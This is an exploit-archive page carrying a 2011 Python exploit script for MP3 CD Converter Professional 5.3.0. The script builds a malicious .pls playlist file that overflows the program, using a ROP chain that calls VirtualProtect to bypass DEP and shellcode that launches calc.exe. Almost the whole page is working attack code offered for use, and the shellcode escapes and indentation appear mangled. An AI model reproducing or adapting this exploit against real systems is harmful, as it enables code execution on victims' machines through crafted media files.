Home / exploitsPDF  

MP3 CD Converter Professional 5.3.0 Overflow

Posted on 12 August 2011

#!/usr/bin/python
#
#[+]Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit
#[+]Date: 1182011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#

from struct import pack
from time import sleep
from sys import exit
print '''

Created By C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com
'''
sleep(2)

shellcode = ("xbaxcbx38xf3xb9xd9xc7xd9x74x24xf4x5fx2bxc9"
"xb1x32x83xefxfcx31x57x0ex03x9cx36x11x4cxde"
"xafx5cxafx1ex30x3fx39xfbx01x6dx5dx88x30xa1"
"x15xdcxb8x4ax7bxf4x4bx3ex54xfbxfcxf5x82x32"
"xfcx3bx0bx98x3ex5dxf7xe2x12xbdxc6x2dx67xbc"
"x0fx53x88xecxd8x18x3bx01x6cx5cx80x20xa2xeb"
"xb8x5axc7x2bx4cxd1xc6x7bxfdx6ex80x63x75x28" # Shellcode WinExec "Calc.exe"
"x31x92x5ax2ax0dxddxd7x99xe5xdcx31xd0x06xef" # BadChars "x00x3d"
"x7dxbfx38xc0x73xc1x7dxe6x6bxb4x75x15x11xcf"
"x4dx64xcdx5ax50xcex86xfdxb0xefx4bx9bx33xe3"
"x20xefx1cxe7xb7x3cx17x13x33xc3xf8x92x07xe0"
"xdcxffxdcx89x45xa5xb3xb6x96x01x6bx13xdcxa3"
"x78x25xbfxa9x7fxa7xc5x94x80xb7xc5xb6xe8x86"
"x4ex59x6ex17x85x1ex80x5dx84x36x09x38x5cx0b"
"x54xbbx8ax4fx61x38x3fx2fx96x20x4ax2axd2xe6"
"xa6x46x4bx83xc8xf5x6cx86xaax98xfex4ax2d")
################################ROP START HERE############################################
rop = pack('<L',0x00425C69) * 4 # RETN
rop += pack('<L',0x0045125a) # PUSH ESP # POP ESI # RETN 04
rop += pack('<L',0x00425C69) * 2 # RETN
rop += pack('<L',0x0046194c) # XCHG EAX,ESI # RETN
rop += pack('<L',0x0040d8b1) # XCHG EAX,ECX # CLD # ADD AL,0 # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,8 # RETN 04
rop += "A" * 24 # JUNK
rop += pack('<L',0x00425C69) * 2 # RETN
rop += pack('<L',0x10008d68) # POP EDI # RETN
rop += pack('<L',0x00425C69) # RETN
rop += pack('<L',0x1000176a) # POP EBP # RETN
rop += pack('<L',0x004319e6) # PUSH ESP # RETN // Endereco de retorno da funcao VirtualProtect
rop += pack('<L',0x0043017a) # POP EBX # RET
rop += pack('<L',0x00000500) # Valor de dwSize
rop += pack('<L',0x004078f6) # POP EDX # ADD EAX,4C48300 # POP ESI # RETN
rop += pack('<L',0x00000040) # Valor de flNewProtect
rop += "BBBB" # JUNK
rop += pack('<L',0x0040dc8c) # POP ESI # RETN
rop += pack('<L',0x01E5225F) # JMP DWORD PTR DS:[EAX] // Jmp to eax, EAX == VirtualProtect
rop += pack('<L',0x00444ad3) # POP EAX # RETN
rop += pack('<L',0x007EC070) # Ponteiro para VirtualProtect
rop += pack('<L',0x1000734d) # PUSHAD # RETN
################################ROP END HERE###############################################
buf = ("A" * 16)
buf += pack('<L',0x00456333) # ADD ESP,318 # RETN 4
buf += ("B" * (784-len(buf)))
buf += pack('<L',0x004462D0) # ADD ESP,51C # RETN
buf += ("A" * 24)
buf += rop
buf += "x90" * 10
buf += shellcode
buf += "C" * 50000
print "		[+]Creating Exploit File..."
sleep(1)
try:
f = open("Exploit.pls","wb")
f.write(buf)
f.close()
print "		[+]File "Exploit.pls" Created Succefully."
sleep(1)
except  IOError,e:
print "		[+]Error: "+str(e)
exit(-1)

 

TOP

Malware :

Exploits :